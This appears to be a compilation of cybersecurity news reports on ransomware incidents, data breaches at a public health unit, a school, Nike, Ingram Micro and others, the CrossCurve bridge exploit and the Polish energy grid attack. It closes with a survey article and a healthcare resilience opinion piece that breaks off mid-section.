Cyble documented 10 significant ransomware attacks from January in its blog post, many of which had supply chain implications. One was an Everest ransomware group compromise of “a major U.S. manufacturer of telecommunications networking equipment ... Everest claims the data includes PDF documents containing sensitive engineering materials, such as electrical schematics, block diagrams, and service subsystem documentation.” Sinobi claimed a breach of an India-based IT services company. “Samples shared by the attackers indicate access to internal infrastructure, including Microsoft Hyper-V servers, multiple virtual machines, backups, and storage volumes,” Cyble said. A Rhysida ransomware group attack on a U.S. life sciences and biotechnology instrumentation company allegedly exposed sensitive information such as engineering blueprints and project documentation. A RansomHouse attack on a China-based electronics manufacturing for the technology and automotive manufacturers nay have exposed “extensive proprietary engineering and production-related data,” and “data associated with multiple major technology and automotive companies.” An INC Ransom attack on a Hong Kong–based components manufacturer for the global electronics and automotive industries may have exposed “client-related information associated with more than a dozen major global brands, plus confidential contracts and project documentation for at least three major IT companies.” Cyble also documented the rise of three new ransomware groups: Green Blood, DataKeeper and MonoLock, with DataKeeper and MonoLock releasing details on technical and payment features aimed at attracting ransomware affiliates to their operations.  

Lakelands Public Health has confirmed that it is actively responding to a cyberattack discovered on January 29, 2026, which affected some of its internal systems. The organization is sharing information about the Lakelands Public Health cyberattack incident proactively to maintain transparency and public trust.  Immediately after detecting the breach, Lakelands Public Health implemented its incident response protocols, secured affected systems, and engaged a leading cybersecurity firm to support the investigation, containment, and recovery efforts. Experts are working closely with the organization to ensure that all systems are restored safely and efficiently.  While restoration efforts are underway, some programs and services may experience temporary disruptions. The organization has committed to directly contacting any individuals or partners affected by interruptions. 

Critical Public Health Data Remains Secure 

Initial investigations indicate that systems managing sensitive public health information, including infectious disease data, immunization records, and sexual health information, were not impacted by the Lakelands Public Health cyberattack. Lakelands Public Health has emphasized that protecting personal information remains a top priority as it continues essential public health operations.  Dr. Thomas Piggott, Medical Officer of Health and Chief Executive Officer of Lakelands Public Health, said, 

“Our priority response to this event is protecting the information entrusted to us and maintaining continuity of critical public health services. By taking a proactive approach and engaging specialized expertise, we are working diligently to restore systems and keep our community informed.” 

The organization serves Peterborough city and county, Northumberland and Haliburton counties, Kawartha Lakes, and the First Nations communities of Curve Lake and Alderville. The cyberattack prompted a review of all systems that could potentially be affected, ensuring that any vulnerabilities are mitigated. 

Lakelands Public Health Cyberattack Investigation

Lakelands Public Health has noted that the investigation into the cyberattack is ongoing. While no personal or health information appears to have been compromised, the organization has committed to alerting affected parties should any issues arise as the review continues.  Officials have advised that during the restoration period, certain programs and services may remain temporarily offline, and affected individuals will receive direct notifications.  The health unit is also closely monitoring its IT infrastructure for unusual activity, and administrators are implementing additional safeguards, including enhanced network monitoring and access controls. These measures are aimed at minimizing risk and ensuring the integrity of public health data during the recovery process. 

Proactive Measures Strengthen Cybersecurity for Lakelands Public Health 

Residents, partners, and staff are encouraged to remain patient and vigilant as Lakelands Public Health continues to prioritize security, transparency, and the continuity of services. Updates regarding the cyberattack and ongoing recovery efforts are available at LakelandsPH.ca.  In response to the incident, Lakelands Public Health has reinforced its commitment to cybersecurity. By engaging specialized expertise and deploying additional monitoring and response tools, the organization aims to reduce the risk of future incidents.  Dr. Piggott reinforced the importance of public confidence, stating that the organization will continue to communicate openly and ensure that all necessary steps are taken to protect sensitive information while maintaining public health services without interruption. 

A cyberattack on Berchem school has raised serious concerns after hackers demanded ransom money not only from the institution but also directly from students’ families. The Berchem school cyberattack incident occurred at the secondary school Onze-Lieve-Vrouwinstituut Pulhof (OLV Pulhof), where attackers disrupted servers and later threatened to release sensitive information unless payments were made. The case, confirmed by the public prosecutor’s office and first reported by ATV, highlights the growing threat of ransomware attacks on schools, where cybercriminals increasingly target educational institutions due to their reliance on digital systems and the sensitive data they store.

Cyberattack on Berchem School Disrupted Servers

The Berchem school hacking incident took place shortly after the Christmas holidays, in early January. According to reports, the school’s servers were taken offline, causing disruption to internal systems. Hackers reportedly demanded a ransom from the school soon after the breach. However, the institution refused to comply with the demands. This decision appears to have triggered an escalation in the attackers’ strategy, shifting pressure onto parents.

School Files Police Complaint After Ransom Demand

Following the cyberattack on Berchem school, OLV Pulhof acted quickly by contacting law enforcement. The school filed a formal complaint against unknown persons and brought in the police’s Regional Computer Crime Unit (RCCU) to respond to the incident. In addition to involving authorities, the school also moved to secure its digital infrastructure. Out of concern for student safety and data protection, the institution reportedly set up a new, secure network environment soon after the breach. The incident is now under investigation by the Federal Judicial Police.

Hackers Target Parents With €50 Per Child Ransom Demand

This week, the cybercriminals expanded their attack by sending threatening messages directly to parents of students. The hackers demanded a ransom of 50 euros per child, warning that private information such as addresses or photos could be released if the payment was not made. A student described the situation, saying that the school required everyone to change passwords and warned students not to click on suspicious links. “We had to change all our passwords at school, otherwise they would release our addresses or photos,” the student said. Another student added that their father received an email demanding payment, which caused fear and uncertainty. “My dad also got an email last night. That scares me a little. They were asking for 50 euros per child.” This tactic reflects a disturbing trend in school cyberattacks, where criminals attempt to exploit families emotionally and financially.

Parents Advised Not to Pay and Not to Click

The school has strongly advised parents not to respond to the ransom demands. Families were told not to pay, and more importantly, not to click on any links or attachments included in the hackers’ communications, as these could lead to further compromise or malware infections. Cybersecurity experts generally warn against paying ransoms, as it does not guarantee that stolen data will be deleted or that systems will be restored. Paying can also encourage attackers to continue targeting schools and vulnerable communities.

Classes Continue Despite Cybersecurity Incident

Despite the attack, lessons at OLV Pulhof have continued. While the school’s servers were initially down, it appears that temporary solutions and new systems allowed teaching to proceed. However, the full consequences of the hacking have not yet been disclosed. It remains unclear what data may have been accessed or whether any personal information was stolen. Educational institutions often store sensitive records, including student details, contact information, and internal documents, making them attractive targets for cybercriminal groups.

Rising Concern Over Ransomware Attacks on Schools

The cyberattack on the Berchem secondary school is part of a wider pattern of increasing cybercrime targeting schools across Europe. Schools often face limited cybersecurity budgets, older IT systems, and large networks of users, making them easier to infiltrate than larger corporate organizations. Attacks like this demonstrate how ransomware incidents can go beyond technical disruption, affecting families and creating fear in local communities.

Investigation Ongoing

Authorities have not yet identified who is behind the attack. The Federal Judicial Police continue to investigate, while the school works to strengthen its systems and protect students and staff. For now, parents are being urged to remain cautious, avoid engaging with the attackers, and report any suspicious communications to law enforcement. The cyberattack on Berchem school incident serves as a reminder that cybersecurity in schools is no longer optional, but essential for protecting students, families, and the education system itself.

A “scary” vulnerability in Broadcom Wi-Fi chipsets could lead to long-term instability and affect how an organization operates.

The post Flaw in Broadcom Wi-Fi Chipsets Illuminates Importance of Wireless Dependability and Business Continuity  appeared first on Security Boulevard.

CrossCurve bridge, formerly known as EYWA, has suffered a major cyberattack after attackers exploited a vulnerability in its smart contract infrastructure, draining approximately $3 million across multiple blockchain networks.   The CrossCurve team confirmed the incident on Sunday, stating that its bridge infrastructure was “currently under attack” and warning users to immediately stop interacting with the protocol.   “Our bridge is currently under attack, involving the exploitation of a vulnerability in one of the smart contracts used,” CrossCurve said in a post on X. “Please pause all interactions with CrossCurve while the investigation is ongoing.” 

Spoofed Cross-Chain Messages Used to Bypass Validation Checks 

Blockchain security account Defimon Alerts identified the root cause of the cyberattack as a gateway validation bypass within CrossCurve’s ReceiverAxelar contract. According to the analysis, the contract lacked a critical validation check, allowing any user to call the expressExecute function with a spoofed cross-chain message.  [caption id="attachment_109109" align="alignnone" width="720"] CrossCurve Exploit Details (Source: Defimon Alerts on X)[/caption] By exploiting this flaw, attackers were able to bypass the intended gateway validation logic and trigger unauthorized token unlocks on the protocol’s PortalV2 contract. As a result, funds were drained without proper authorization. The exploit impacted the CrossCurve bridge across multiple networks, highlighting the risks associated with cross-chain messaging systems.  Data from Arkham Intelligence, shared by Defimon Alerts, shows that the PortalV2 contract’s balance dropped from roughly $3 million to nearly zero around January 31. Transaction data indicates that the exploit unfolded across several chains, rather than being confined to a single network. 

CrossCurve Cyberattack Revives Concerns Over Bridge Security

CrossCurve, previously branded as EYWA, operates a cross-chain decentralized exchange and liquidity protocol developed in partnership with Curve Finance. The protocol relies on what it calls a “Consensus Bridge,” which routes transactions through multiple independent validation mechanisms, including Axelar, LayerZero, and the EYWA Oracle Network. The design was intended to reduce reliance on any single system and minimize points of failure.  In its documentation, CrossCurve had highlighted this architecture as a key security advantage, stating that “the probability of several crosschain protocols getting hacked at the same time is near zero.” The recent cyberattack, however, demonstrated that a vulnerability in a single smart contract can still compromise the broader system, regardless of the number of validation layers involved.  The project has prominent backing in the decentralized finance ecosystem. Curve Finance founder Michael Egorov became an investor in the protocol in September 2023, and CrossCurve later announced that it had raised $7 million from venture capital firms.  Following the exploit, Curve Finance issued a warning to users with exposure to EYWA-related pools. “Users who have allocated votes to Eywa-related pools may wish to review their positions and consider removing those votes,” Curve Finance wrote on X. “We continue to encourage all participants to remain vigilant and make risk-aware decisions when interacting with third-party projects.”  Security researchers compared the CrossCurve bridge exploit to earlier incidents in the sector. The vulnerability bears similarities to the 2022 Nomad bridge hack, in which attackers drained approximately $190 million after discovering a flawed validation mechanism. That exploit escalated rapidly, with hundreds of wallet addresses copying the attack once it became public. 

A cyberattack by Russian state-sponsored threat actors that targeted at least 30 wind and solar farms in Poland relied on default credentials, lack of multi-factor authentication (MFA) and outdated and misconfigured devices, according to a new report on the December 2025 incident by CERT Polska, the Polish computer emergency response team. The new report underscores the difficulty of securing critical infrastructure systems, which frequently rely on outdated devices that are difficult to update. In the Polish energy grid attack, credential and configuration errors compounded the vulnerabilities. CERT Polska attributed the campaign to Static Tundra, a group linked to Russia’s Federal Security Service (FSB) Center 16 unit, but a Dragos report on one of the Polish energy grid incidents attributed the activity to the ELECTRUM subgroup of Sandworm, a threat group linked to the GRU, Russia's military intelligence service, that was implicated in destructive attacks on the Ukraine power grid a decade ago. The Polish report notes that the DynoWiper malware used in the latest attacks “contains certain similarities to wiper-type tools3 associated with the activity cluster publicly known as ‘Sandworm’ and ‘SeashellBlizzard,’” but the report adds, “Despite identifying commonalities in behavioral characteristics and overall architecture, the level of similarity is too low to attribute DynoWiper to previously used wiper families.” The attackers’ activities began between March and May 2025, months before the December 29 attack.

Polish Energy Grid Attack Could Have Been Worse

The CERT Polska report said the December attack “resulted in a loss of communication between the facilities and distribution system operators (DSOs), but it did not affect ongoing electricity generation” or impact the stability of the Polish power system. “It should be noted, however, that given the level of access obtained by the attacker, there was a risk of causing a disruption in electricity generation at the affected facilities,” the report said. “Even if such a disruption had occurred, analyses indicate that the combined loss of capacity across all 30 facilities would not have affected the stability of the Polish power system during the period in question.” Dragos noted that in its incident response case, the attackers “gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site,” an attack the company called “very alarming.” “This is the first major cyber attack targeting distributed energy resources (DERs), the smaller wind, solar, and CHP facilities being added to grids worldwide,” Dragos said. “Unlike the centralized systems impacted in electric grid attacks in 2015 and 2016 in Ukraine, these distributed systems are more numerous, require extensive remote connectivity, and often receive less cybersecurity investment. This attack demonstrates they are now a valid target for sophisticated adversaries.” “An attack on a power grid at any time is irresponsible, but to carry it out in the depths of winter is potentially lethal to the civilian population dependent on it,” Dragos added. “It is unfortunate that those who attack these systems appear to deliberately choose timing that maximizes impact on civilian populations.”

Credential and Configuration Mistakes Exploited in Polish Energy Grid Attack

In the Polish energy grid attack, the attackers exploited a long list of outdated and misconfigured devices and default and static credentials that weren’t secured with MFA. The Polish report noted that in each affected facility, a FortiGate device served as both a VPN concentrator and a firewall. “In every case, the VPN interface was exposed to the Internet and allowed authentication to accounts defined in the configuration without multi‑factor authentication,” the report said. The report noted that it’s a common practice in the industry to reuse the same accounts and passwords across multiple facilities. “In such a scenario, the compromise of even a single account could have enabled the threat actor to identify and access other devices where the same credentials were used,” CERT Polska said. The networks of the targeted facilities often contained segregated VLAN subnets, but as the attackers had administrative privileges on the device, “These privileges were likely used to obtain credentials for a VPN account with access to all subnets,” the report said. “Even if no such account had existed, the attacker, having administrator-level access, could have modified the device configuration to enable equivalent access.” In one incident, the attacker gained access to the SSL‑VPN portal service of a FortiGate device located at the organization’s network perimeter by using “multiple accounts that were statically defined in the device configuration and did not have two‑factor authentication enabled.” After gaining access, the attackers used bookmarks defined in the configuration file to access jump hosts via RDP, the report said. Analysis of a FortiGate device configuration file indicated that some users had statically configured target user credentials, which enabled connections to the jump host from the SSL‑VPN portal without the need for additional local or domain user credentials. The attacker also made configuration changes that included a new rule that allowed connections using any protocol and IP address to a specified device and disabling network traffic logging. Using the Fortinet scripting mechanism, the attacker also created scripts for further credential exfiltration and to modify security settings, which were executed weekly. The report also detailed numerous out-of-date or misconfigured operational technology (OT) devices, many with default credentials, such as Hitachi and Mikronika controllers, and secure update features that weren’t enabled. In the case of Hitachi Relion 650 v1.1 IEDs, the default FTP account hadn’t been disabled in accordance with the manufacturer’s recommendations. In cases where an HMI used unique credentials for the local administrator account, “unsuccessful password‑breaking attempts were observed. In those cases, the HMI was not damaged.” The attackers also pivoted to cloud services, the report said.

A cyberattack on Delta, a Russian provider of alarm and security systems for homes, businesses, and vehicles, has disrupted operations and triggered widespread service outages, leaving many customers unable to access critical security functions. Delta, which serves tens of thousands of users across Russia, confirmed the Delta cyberattack on Monday, stating that it faced a major external assault on its IT infrastructure. The disruption due to cyberattack on Delta has affected both online services and customer communication channels, raising concerns about the resilience of connected security platforms.

Cyberattack on Delta Security Systems Causes Major Outage

In an official statement, the company emphasized its position in the market and its ongoing investments in cybersecurity. Delta said: “On January 26, DELTA experienced a large-scale external attack on its IT infrastructure aimed at disrupting the company's services.” The company added that some services were temporarily unavailable, but insisted there were no immediate signs of customer data exposure. “At this time, no signs of a compromise of customer personal data have been detected.” Delta also apologized to customers and said restoration efforts were underway with the help of specialized experts.

Delta Struggles to Restore Services After Cyberattack

Delta marketing director Valery Ushkov provided additional details in a video address, acknowledging the large scale of the incident. He said: “Our architecture was unable to withstand a well-coordinated attack coming from outside the country.” Ushkov noted that recovery was taking longer than expected because the company was still facing the risk of follow-up attacks while attempting to restore backups. As of Tuesday, Delta’s website and phone lines remained offline. With traditional communication channels down, the company has been forced to issue updates through its official page on VKontakte, Russia’s largest social media platform.

Customers Report Alarm Failures and Vehicle Access Issues

The Delta cyberattack disruption has had direct consequences for customers relying on the company’s systems for everyday safety and mobility. Russian-language Telegram outlet Baza reported that users began complaining shortly after the incidentof cyberattack on Delta that car alarm systems could not be turned off, and in some cases, vehicles could not be unlocked. Newspaper Kommersant also reported ongoing failures despite Delta’s assurances that most services were operating normally. Users described serious malfunctions, including remote vehicle start features failing, doors locking unexpectedly, and engines shutting down while in motion. In addition to vehicle-related issues, customers reported that alarm systems in homes and commercial buildings switched into emergency mode and could not be deactivated. Recorded Future News said it could not independently verify these claims.

Data Leak Claims Surface After Delta Cyberattack

Although Delta maintains that no customer data was compromised, uncertainty remains. An unidentified Telegram channel claiming to be operated by the attackers published an archive it alleges contains stolen information from Delta systems. However, the authenticity of the material and the identity of the hackers have not been independently verified. The cyberattack on Delta has increased anxiety among customers, particularly because Delta’s mobile app, launched in 2020, is widely used for tracking vehicles and managing alarm functions. According to Auto.ru, the app is compatible with most cars and can store payment data, making some users wary of potential financial exposure if internal systems were breached.

Broader Pattern of IT Disruptions in Russia

The Delta security systems cyberattack occurred on the same day as a separate large-scale outage affected booking and check-in systems used by Russian airlines and airports. Airlines reported temporary disruptions to ticket sales, refunds, and rebooking after problems were detected in aviation IT platforms. While the two incidents have not been officially linked, the timing highlights growing instability in critical digital infrastructure. No known hacking group has claimed responsibility for the cyberattack on Delta so far. It also remains unclear whether the incident was a relatively limited distributed denial-of-service (DDoS) attack or something more severe, such as ransomware or destructive malware. For now, Delta says the situation is manageable and expects services to return soon, but customer concerns continue as outages persist and unverified leak claims circulate.

In today’s digital world, our private information is more accessible than ever. The benefits of the internet pose a significant threat to our privacy and security. Doxxing is one such threat, which means publicly revealing private, sensitive, or identifying information about an individual without their consent. This information includes home addresses, emails, phone numbers, workplaceRead More

The post What It Doxxing? How It Happens, and How to Stay Safe? appeared first on EncryptedFence by Certera - Web & Cyber Security Blog.

The post What It Doxxing? How It Happens, and How to Stay Safe? appeared first on Security Boulevard.

Nike has confirmed that it is investigating a potential cybersecurity incident after claims surfaced online that its internal data may have leaked by a cybercrime group. The same group, known for extortion-driven attacks against other companies, previously claimed the Nike cyberattack on its dark web site.  Nike acknowledged the situation of a potential cybersecurity incident, stating, “We always take consumer privacy and data security very seriously. We are investigating a potential cybersecurity incident and are actively assessing the situation.” The company has not yet disclosed whether the cyberattack on Nike involved customer, employee, or partner data. 

Hacker Group Claims the Nike Cyberattack

The allegations stem from a ransomware group known as World Leaks, which claimed on its website that it had published 1.4 terabytes of data allegedly tied to Nike’s business operations. The group did not specify what types of files or information were included in the purported leak.  The Cyber Express reached out to Nike for further details regarding the reported cyberattack on Nike. However, as of the time of writing, the company had not shared any additional updates or clarification about the incident or its potential impact.  World Leaks is an extortion-focused cybercrime group that steals corporate data to pressure victims into paying ransoms, threatening public disclosure if demands are not met. The group emerged in 2025 after rebranding from Hunters International, a ransomware gang active since 2023. Following increased law enforcement scrutiny, the group reportedly abandoned traditional file-encryption tactics and shifted entirely to data theft and extortion. It has since claimed hundreds of victims. 

Potential Partner Impact and Broader Industry Context 

It remains unclear whether the alleged Nike data breach affected information belonging to any of Nike’s major wholesale partners. The company works closely with large retailers such as Dick’s Sporting Goods, Macy’s, and JD Sports.  The reported cyberattack on Nike comes as data breaches continue to disrupt major corporations worldwide. High-profile cyber incidents in 2023 and 2024 affected companies, including MGM Resorts International, Clorox, and UnitedHealth Group. MGM disclosed losses of at least $100 million tied to its attack, while Clorox reported a decline of more than $350 million in quarterly net sales following its breach.  The incident also follows similar developments within the sportswear sector. TechCrunch recently reported that Under Armour launched an investigation after 72 million customer email addresses were posted online.  

Nike’s Business Challenges Amid Cybersecurity Concerns 

According to The Star, Nike has been working to regain its position as the world’s dominant sportswear brand after losing market share to smaller competitors. Against this backdrop, the emergence of a potential Nike cyberattack adds another layer of uncertainty. Despite the reports, Nike’s shares were flat as of late morning on Monday, indicating that investors may be waiting for verified details before reacting.  As investigations continue, it remains uncertain whether the alleged Nike data breach will be confirmed or what consequences may follow. Nike has stated only that it is actively assessing the situation, and further information is expected as the inquiry progresses and claims related to the cyberattack on Nike are independently evaluated.   This is an ongoing story, and The Cyber Express will be closely monitoring the situation. We will update this post once we have more information on the Nike cyberattack or any additional information from the company. 

The fallout from the Manage My Health data breach is continuing, with the company warning that fraudsters may now be attempting to contact affected users by impersonating the online patient portal.  Manage My Health, which operates a widely used digital health platform in New Zealand, confirmed that most people impacted by the breach have now been notified. However, the organization cautioned that secondary criminal actors may be exploiting the situation by sending phishing or spam messages that appear to come from Manage My Health.  “We’re also aware that secondary actors may impersonate MMH and send spam or phishing emails to prompt engagement. These communications are not from MMH,” the company said in a statement. It added that it is investigating measures to limit this activity and has issued guidance to help users protect themselves.  The MMH cyberattack, which occurred late last year, involved unauthorized access to documents stored within a limited feature of the platform. Cyber criminals reportedly demanded thousands of dollars in ransom, threatening to release sensitive data on the dark web. If released, the information could have exposed the medical details of more than 120,000 New Zealanders. 

Information Accessed in the Manage My Health Data Breach 

According to Manage My Health, the cyberattack did not affect live GP clinical systems, prescriptions, appointment scheduling, secure messaging, or real-time medical records. Instead, the breach was confined to documents stored in the “My Health Documents” section of the platform.  These documents included files uploaded by users themselves, such as correspondence, reports, and test results, as well as certain clinical documents. The latter consisted of hospital discharge summaries and clinical letters related to care received in Northland Te Tai Tokerau.  Upon detecting unusual system activity, Manage My Health said it immediately secured the affected feature, blocked further unauthorized access, and activated its incident response plan. Independent cybersecurity specialists were engaged to investigate the incident and confirm its scope.  The company stated that the breach has since been contained and that testing has confirmed the vulnerability is no longer present. 

Notifications and Regulatory Response 

Manage My Health acknowledged that its initial response led to some individuals being notified prematurely. “When we first identified the breach, our priority was to promptly inform all potentially affected patients,” the organization said, noting that this cautious approach resulted in some people being contacted even though they were later found not to be impacted.  Following forensic investigations, those individuals were subsequently informed that their data had not been affected. Users can confirm their status by logging into the Manage My Health web application, where a green “No Impact” banner indicates no involvement in the incident.  The company said notification efforts are ongoing due to the complexity of coordinating communications across patient groups, authorities, and data controllers, while ensuring compliance with the New Zealand Privacy Act.  The Manage My Health data breach has also triggered regulatory scrutiny. The Office of the Privacy Commissioner (OPC) has announced an inquiry into the privacy aspects of the incident. Manage My Health confirmed it is working closely with the OPC, as well as Health New Zealand | Te Whatu Ora, the National Cyber Security Centre, and the New Zealand Police. 

Legal Action and Monitoring Efforts 

As part of its response to the MMH cyberattack, Manage My Health sought and was granted an interim injunction from the High Court. The injunction prohibits any third party from accessing, publishing, or disseminating the impacted data.  The organization said it is actively monitoring known data leak websites and is prepared to issue takedown notices immediately if any information appears online.  Additional security measures taken include remediating compromised account credentials, temporarily disabling the Health Documents module, and implementing continuous monitoring while broader security upgrades are rolled out. An independent forensic investigation remains ongoing, with the company declining to comment on specific technical findings at this stage. 

Guidance for Users 

Manage My Health has reiterated that it will never ask users for passwords or one-time security codes. It has urged caution when receiving unexpected or urgent messages claiming to be from the company.  Anyone contacted by individuals claiming to possess their health data is advised not to engage and to report the incident to New Zealand Police via 105, or 111 in an emergency, and notify Manage My Health support.  To assist those concerned about identity misuse, the company has partnered with IDCARE, which provides free and confidential cyber and identity support across Australia and New Zealand.  “We take the privacy of our clients and staff very seriously, and we sincerely apologise for any concern or inconvenience this incident may have caused,” Manage My Health said, adding that it remains committed to transparency as investigations into the cyberattack on Manage My Health continue. 

Ingram Micro, one of the world’s largest IT distributors, has confirmed that sensitive personal data was leaked following a ransomware attack that disrupted its operations last year. The Ingram Micro data breach incident, which paralysed the company’s logistics systems for nearly a week in July 2025, has now been linked to the theft of files containing employee and applicant information, affecting more than 42,000 individuals. The Ingram Micro data breach came to light through a mandatory filing with U.S. authorities, which revealed that 42,521 people were impacted, including five residents of the state of Maine. According to the company, the attackers accessed internal file repositories between July 2 and July 3, 2025, during an external system breach involving hacking. However, the breach was only discovered several months later, on December 26, 2025.

Ransomware Attack Led to Extended Disruption

The data exposure follows a ransomware attack that caused widespread operational disruption at Ingram Micro in July 2025. At the time, the company’s logistics were reportedly paralysed for about a week, affecting its ability to process and distribute products. While the immediate impact of Ingram Micro data breach on operations was known, it has now emerged that the attackers also exfiltrated sensitive files during the same period. In a notice sent to affected individuals, Ingram Micro said it detected a cybersecurity incident involving some of its internal systems on July 3, 2025. The company launched an investigation into the nature and scope of the issue and determined that an unauthorised third party had taken certain files from internal repositories over a two-day window.

Ingram Micro Data Breach: Personal and Employment Data Stolen

The compromised files included employment and job applicant records, containing a wide range of personal information. According to the Ingram Micro data breach notification, the stolen data may include names, contact information, dates of birth, and government-issued identification numbers such as Social Security numbers, driver’s licence numbers, and passport numbers. In addition, certain employment-related information, including work evaluations and application documents, was also accessed. The company noted that the types of affected personal information varied by individual. Ingram Micro employs approximately 23,500 people worldwide, and the breach affected both current and former employees, as well as job applicants. Ingram Micro said it took steps to contain and remediate the unauthorised activity as soon as the incident was detected. These measures included proactively taking certain systems offline and implementing additional security controls. The company also engaged leading cybersecurity experts to assist with its investigation and notified law enforcement. As part of its response to the Ingram Micro data breach, the company conducted a detailed review of the affected files to understand their contents. It was only after completing this review that Ingram Micro confirmed that some of the files contained personal information about individuals.

Support Offered to Affected Individuals

Ingram Micro is notifying impacted individuals and encouraging them to take steps to protect their personal information. Under U.S. law, affected individuals are entitled to one free credit report annually from each of the three nationwide consumer reporting agencies. The company has also arranged to provide complimentary credit monitoring and identity protection services for two years. In its notification, Ingram Micro urged people to remain vigilant by reviewing their account statements and monitoring their credit reports. The company included guidance on how to register for the free protection services and additional steps to reduce the risk of identity theft. For further assistance, Ingram Micro has set up a dedicated call centre for questions related to the breach. The company said it regrets any inconvenience caused and is working to address concerns raised by those affected.

Broader Implications for Corporate Cybersecurity

The incident highlights the growing risks organisations face from ransomware attacks that not only disrupt operations but also result in data theft. The delay between the occurrence of the breach in July and its discovery in December emphasizes the challenges companies face in detecting and containing sophisticated cyber intrusions. For large enterprises like Ingram Micro, which play a central role in global IT supply chains, the consequences of such attacks can extend beyond immediate operational losses. The exposure of sensitive employee and applicant data adds a long-term dimension to the impact, increasing the risk of identity theft and fraud for those affected. As investigations continue, the ransomware attack on Ingram Micro serves as a reminder of the importance of strong cybersecurity controls, continuous monitoring, and timely incident response to limit both operational disruption and data loss.

UK businesses are facing growing pressure from cyber threats, with a new survey warning that many may not withstand major UK businesses cyberattack. The findings highlight how exposed companies across the country remain to online fraud and cybercrime, as gaps in training, weak password practices, and increasingly sophisticated scams continue to undermine cyber resilience. According to a recent Vodafone Business study, more than one in ten business leaders in the UK believe their organisation would be unlikely to survive a major cyberattack. The research, which surveyed 1,000 senior leaders across British businesses of all sizes, paints a concerning picture of how prepared—or unprepared—many firms are for incidents similar to those that disrupted major UK retailers and car manufacturers last year.

Weak Preparedness and Rising Threats Put Firms at Risk

The survey suggests that risk awareness has grown, but action has not kept pace. Nearly two-thirds of business leaders (63%) reported that their organisation’s risk of cyberattack has increased over the past year. At the same time, 89% said the highly publicised attacks on well-known brands last year had made them significantly more alert to online threats. Despite this heightened awareness, fewer than half (45%) have ensured that all staff have undergone basic cyber-awareness training. This gap between concern and concrete action is leaving many UK businesses cyberattack–ready in name only, without the practical safeguards needed to prevent or respond effectively to incidents. The findings also point to troubling weaknesses in everyday security practices. Password reuse remains widespread, with employers estimating that staff use their work passwords for an average of 11 other personal accounts, including social media and dating platforms. Such habits significantly increase the risk of credential theft and unauthorised access, particularly when personal platforms suffer breaches.

UK Businesses Cyberattack: Human Error Remains a Major Vulnerability

The study underlines the central role of human behaviour in cyber risk. Nearly three-quarters of business leaders (71%) believe that at least one member of their staff would fall for a convincing phishing email. The most common reasons cited were a lack of awareness and training, staff being “too busy,” and the absence of clear protocols for verifying and flagging suspicious messages. These factors continue to erode cyber resilience, especially as phishing campaigns grow more advanced. The emergence of artificial intelligence and deepfake scams is further complicating the threat landscape. Around seven in ten leaders said that deepfake AI videos have made them more wary of video calls that claim to be from senior colleagues or their boss, signalling a growing concern about impersonation fraud and social engineering attacks.

Government Moves to Strengthen National Defences

The UK Government’s announcement of a second Telecommunications Fraud Charter, set to launch later this year, has been positioned as a key step in strengthening national defences against cyber-enabled crime. The charter aims to bring industry and government closer together to close vulnerabilities, disrupt criminal activity, and protect businesses from financial and operational harm. By enhancing collaboration and setting clearer standards for prevention, detection, and response, the new charter is intended to provide a more coordinated framework to safeguard the resilience and trust that UK businesses rely on. It also aligns with a broader fraud strategy expected to be launched next year.

Industry Reaction and Call for Practical Measures

Commenting on the findings, Nick Gliddon, Business Director, VodafoneThree, said: “Some of these findings are truly alarming. The revelation that one in ten business leaders believe their company would not survive a cyber-attack highlights the scale of vulnerability facing UK firms today. “Many steps – such as avoiding password reuse and enhancing staff training – are relatively simple to implement, and Vodafone Business is here to support organisations with practical solutions and expert guidance. “In this context, the Government’s announcement of its second Telecommunications Fraud Charter, coupled with a new fraud strategy to be launched next year, marks a significant and timely development. “This renewed focus from policymakers underscores the seriousness of the threat and the necessity of a united approach between industry and government to effectively tackle online fraud and cyber-crime.” The survey results serve as a warning that cyber resilience is still uneven across sectors and company sizes. While awareness of threats is growing, persistent weaknesses in training, password practices, and incident readiness continue to leave many organisations vulnerable. As cybercriminals adopt more advanced tools and techniques, including AI-driven scams, the gap between perceived risk and real preparedness could become increasingly costly. For UK businesses cyberattack readiness is no longer optional, it is a critical factor that may determine whether a company can survive and recover from the next major incident.

By Suresh Kanniappan, Sales Head, Infrastructure Management and Security Services, US at Happiest Minds Let’s revisit the recent ransomware attack that hit one of the biggest hospital networks in the US. The cyberattack shut down surgeries, made patients' records unavailable, and forced emergency departments to divert incoming cases. Unfortunately, this is not an isolated story. Throughout 2025, healthcare organisations have faced a growing wave of cyber threats, highlighting the urgent need for Cyber Resilience in Healthcare. The scale and precision of cyber threats have increased manifold, with impacts extending far beyond data breaches: disrupting care, delaying diagnoses, and even shaking the very foundation of patient trust.

Why has Cyber Resilience in Healthcare Become More Critical Than Ever?

The recent report released by the U.S. Department of Health and Human Services, which found that more than 133 million patient records were compromised in the first half of 2025, marking the highest number to date. More concerning is the impact of ransomware attacks, which have grown 3X, affecting everything from the electronic health record systems to connected diagnostic equipment. All these incidents have had a significant impact on human life. There were many postponed surgeries, families were afraid about what was next, and the clinicians had no access to the vital data when it was needed most. All these were not just operational challenges; they were an alarm for all healthcare systems that building a strong resilience is essential in today's highly connected digital world. What we need to understand is clear: cybersecurity in healthcare is no longer about prevention alone; it's about resilience, recovery, and readiness. So, what must the healthcare industry focus on in 2026 and beyond?

1. Zero Trust to Replace Perimeter: Zero Trust security is already in place, but how effectively it is implemented is to be verified. Zero trust will continue to be the backbone of every industry, ensuring every user, every device, and every access is verified without exception. It is not just about restricting access; it is about knowing who has access to what and granting permission to the right people for the right requirements.
2. AI will Redefine Defense: AI has become an integral part of our lives; it is re-shaping both cyber-attacks and defense. Cyber adversaries are using AI to create personalized phishing attacks, exploit unpatched devices, and steal data and credentials at a pace humans can't match. The advice for healthcare experts is to implement AI as a new defense engine, deploying AI-driven threat analytics, automated response workflows, and continuous monitoring to spot and contain threats in real time. This will help healthcare security teams protect data and clinical operations much faster and with higher precision.
3. Supply Chain Vigilance to be Stepped Up: The recent breaches over the last 1 year have not happened within the boundaries of the hospitals, but it is beyond that through third-party vendors, devices, and software. It's time for the healthcare providers to look into every vendor that enforces real-time risk monitoring, contractual accountability, and shared visibility across the entire healthcare and value chain. They need to bring strong security in place to ensure resiliency.
4. Regulations Will Drive Accountability: Global regulators are strengthening mandates around healthcare data protection, breach reporting, and AI transparency. In the coming year, leadership involvement in cybersecurity governance will need to be stronger. Boards and CXOs will need to give digital safety the same priority as patient safety. Compliance will become an ongoing practice of accountability rather than just an annual paperwork exercise. Role of the leaders

Strategic Priorities of Healthcare Leaders

